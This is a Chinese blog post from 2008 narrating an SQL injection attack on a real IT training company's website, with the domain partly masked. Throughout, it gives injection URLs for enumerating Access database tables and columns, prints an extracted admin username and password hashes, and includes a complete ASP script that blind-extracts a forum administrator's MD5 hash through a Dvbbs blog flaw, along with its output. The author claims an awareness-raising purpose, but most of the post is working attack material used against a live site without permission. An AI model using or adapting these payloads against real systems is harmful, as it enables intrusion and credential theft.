数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



手工检测某天IT教育集团网站
樱木花盗 发表于 2008-11-14 18:20:18
本文首发 红狼  &天阳
作者:Amxking
首先说本文只是为了介绍一下网站的检测方法,并未实质上完成入侵-Amxking
偶然进入到了誉天IT教育集团网站,看到武汉专业思科培训,CCNA、CCNP、CCSP、CCIE认证培训等等内容,叫我回忆起了自己学cisco时候的经历.于是打算看看他们的学员,于是打开了学员风采栏目.(首页 → 服务互动 → 学员采风)
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89
一不小心潜意识的加了个 '单引号' ,接触返回了如下错误提示:
首页 → 服务互动
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'unid = 89'' 中。
/common.asp,行 125
呵呵,有意思,继续探试 and 1=1
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=1
返回正常页面,但是同时也弹出了"防注射系统".看来网站制作人在网站程序方面还是有安全意识地,不过这吓不倒谁,至少我的群名就叫[火力]依然那么猛,go on......
图:

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%201=2

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89'%20and%20(select%20count(*)%20from%20msysobjects)>0--
首页 → 服务互动
Microsoft JET Database Engine 错误 '80040e14'
字符串的语法错误 在查询表达式 'unid = 89' and (select count(*) from msysobjects)>0--' 中。
/common.asp,行 125

http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89 and exists(select * from admin)
这个语句是向数据库查询是否存在admin这个表,如果存在则返回正常页面,不存在会返回错误提示.
返回结果如下:
Microsoft JET Database Engine 错误 '80040e37'
Microsoft Jet 数据库引擎找不到输入表或查询 'admin'。 确定它是否存在,以及它的名称的拼写是否正确。
/common.asp,行 125
结果返回的还真是错误提示,看来这常见管理表admin确实受到了足够的重视.经过几翻尝试,最后终于确定了管理表为article_admin ,
感谢我的表字典,阿门!
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%20exists(select%20*%20from%20article_admin)
返回正常,确定了管理表为article_admin .
然后我们尝试猜测列名为username:
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and exists(select username from article_admin)
返回正常页面,列名猜测成功.
猜测ID,在猜测ID的时候我平静的心灵终于被打破,产生了想杀人的冲动,ID=21.....
http://www.51xxxxxxxxx.com/2j.as ... 9%20and%20exists%20(select%20id%20from%20article_admin%20where%20id=21)
再次见到了防注射系统提示:
图:
下面我们利用得到的ID,猜测用户名的位数,经过折半测试后确定在了11位.(Amxking:管理员有够变态,一个名字都这么长...)
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89%20and%20exists(select%20id%20from%20article_admin%20where%20len(username)=11%20and%20id=1)
猜测用户名:
在猜测中,遇到了麻烦,试了几次都返回同样的错误,心早已不平静,愤怒中.还没等爆发,同事叫我吃午饭,于是将问题丢给了工具......
http://www.51xxxxxxxxx.com/2j.asp?id=77&cid=89 and exists(select count(*) from article_admin where left(username,1)=’a’)
Microsoft JET Database Engine 错误 '80040e10'
至少一个参数没有被指定值。
/common.asp,行 125
吃完饭后,我的宝贝工具还算争气,将用户名及密码交给了我:
username内容:windecember
password内容:70b895ad9b1b2829
是MD5加密的?丢给cmd5试下,不行.我是没有爆破的习惯,谁叫咱不玩肉鸡了.难道就这样结束了吗?灰心不代表停止进攻,否则火力往哪猛去?
(网站后台还没找到,否则就先尝试社工了...)
看到有论坛,进去看眼吧!Powered By Dvbbs Version 7.1.0 Sp1 ,看到这个版本后心情豁然开朗,因为具自己所知该版本存在漏洞的说.
OK,现日了一个小站,用来放远程读取论坛管理员密码程序,通过踩点确定了路径该为http://www.www.51xxxxxxxxx.com.com/52network/boke.asp  而管理员大致确定为
windecember ,谁叫看着这个名字熟悉那,(网站后台用户不就是他......) 嘿嘿,编辑程序远程读取吧!程序代码如下:
<br><br>
<br><br>
<center>
<div align='left' style="width:500px;font-size:12px;">
<%
Server.ScriptTimeout=300
Response.Buffer = True
Dim hehefulsh
Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
tempstr=""
for total=0 to 15
for theoffset=0 to 15
templen=0
OpenURL="http://www.51xxxxxxxxx.com/52network/boke.asp?windecember'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")and''='.index.html.index.html"
hehefulsh.Open "Get",OpenURL, False, "", ""
hehefulsh.Send
GetPage = BytesToBstr(hehefulsh.ResponseBody)
If InStr(GetPage,"该博客用户不存在或填写的资料有误!")=0 Then
tempstr=tempstr & charhex(theoffset)
response.write "前" & total+1 & "位MD5值为:" & tempstr & " 其他密码正在读取中,请等待。。。<BR>"
Response.Flush
Exit for
End if
Next
Next
response.write "<br><br><br>成功读取密码的MD5值,为:" & tempstr & " <BR><BR><BR>Amxking提醒:请不要使用本程序进行破坏行为!"
Set hehefulsh = Nothing
Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
</div>
</center>
保存在一个小站根目录下命名为ak.asp ,然后IE访问,读取.........
PS:严重鄙视Sun.Li这小子,风风火火的骂着闯进了群,说我不加他进,为了他进我现T了一个人才加进来.群满N久,换个人我容易吗我...黑封说的好:"开你毛会去吧...."哈哈 ,解气....
读取的结果出来了,比想象中快:
前1位MD5值为:a 其他密码正在读取中,请等待。。。
前2位MD5值为:ad 其他密码正在读取中,请等待。。。
前3位MD5值为:adc 其他密码正在读取中,请等待。。。
前4位MD5值为:adc9 其他密码正在读取中,请等待。。。
前5位MD5值为:adc98 其他密码正在读取中,请等待。。。
前6位MD5值为:adc989 其他密码正在读取中,请等待。。。
前7位MD5值为:adc9892 其他密码正在读取中,请等待。。。
前8位MD5值为:adc98924 其他密码正在读取中,请等待。。。
前9位MD5值为:adc98924f 其他密码正在读取中,请等待。。。
前10位MD5值为:adc98924f7 其他密码正在读取中,请等待。。。
前11位MD5值为:adc98924f7b 其他密码正在读取中,请等待。。。
前12位MD5值为:adc98924f7b6 其他密码正在读取中,请等待。。。
前13位MD5值为:adc98924f7b6b 其他密码正在读取中,请等待。。。
前14位MD5值为:adc98924f7b6be 其他密码正在读取中,请等待。。。
前15位MD5值为:adc98924f7b6beb 其他密码正在读取中,请等待。。。
前16位MD5值为:adc98924f7b6beb9 其他密码正在读取中,请等待。。。
成功读取密码的MD5值,为:adc98924f7b6beb9
ok,再次丢给在线破MD5密码的站点查,结果证明了我本善良......
希望以本篇文章警醒各网站负责人提高网络安全意识,普及网络安全技术.-Amxking
                                    本文完

http://amxking.bokee.com/viewdiary.179132855.html

PS:跟誉天的工作人员沟通后答应将网站地址隐藏-Amxking  11/28

阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.